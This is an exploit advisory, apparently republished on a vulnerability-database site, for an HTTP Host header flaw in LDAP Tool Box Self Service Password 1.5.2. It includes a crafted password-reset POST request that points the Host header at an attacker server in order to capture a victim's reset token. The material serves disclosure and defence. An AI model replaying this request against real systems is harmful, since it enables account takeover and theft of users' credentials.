Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

LDAP Tool Box Self Service Password 1.5.2 Account Takeover

🗓️ 06 Apr 2023 00:00:00Reported by Tahar BennacefType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 246 Views

LDAP Tool Box Self Service Password 1.5.2 Account Takeover - HTTP Host Header Vulnerabilit

Code
`# Exploit Title: LDAP Tool Box Self Service Password v1.5.2 - Account takeover  
# Date: 02/17/2023  
# Exploit Author: Tahar BENNACEF (aka tar.gz)  
# Software Link: https://github.com/ltb-project/self-service-password  
# Version: 1.5.2  
# Tested on: Ubuntu  
  
Self Service Password is a PHP application that allows users to change  
their password in an LDAP directory.  
It is very useful to get back an account with waiting an action from an  
administration especially in Active Directory environment  
  
The password reset feature is prone to an HTTP Host header vulnerability  
allowing an attacker to tamper the password-reset mail sent to his victim  
allowing him to potentially steal his victim's valid reset token. The  
attacker can then use it to perform account takeover  
  
  
*Step to reproduce*  
  
1. Request a password reset request targeting your victim and setting in  
the request HTTP Host header the value of a server under your control  
  
POST /?action=sendtoken HTTP/1.1  
Host: *111.111.111.111*  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101  
Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 16  
Origin: https://portal-lab.ngp.infra  
Referer: https://portal-lab.ngp.infra/?action=sendtoken  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
Connection: close  
  
login=test.reset  
  
  
As the vulnerable web application's relying on the Host header of the  
password-reset request to craft the password-reset mail. The victim  
receive a mail with a tampered link  
[image: image.png]  
  
2. Start a webserver and wait for the victim to click on the link  
  
If the victim click on this tampered link, he will sent his password reset  
token to the server set in the password-reset request's HTTP Host header  
[image: image.png]  
  
3. Use the stolen token to reset victim's account password  
  
  
Best regards  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Apr 2023 00:00Current
6.8Medium risk
Vulners AI Score6.8
account takeoverhttp host headerldap tool boxself service passwordvulnerabilitypassword resetactive directoryphp applicationsecurity exploitubuntugithubweb security
246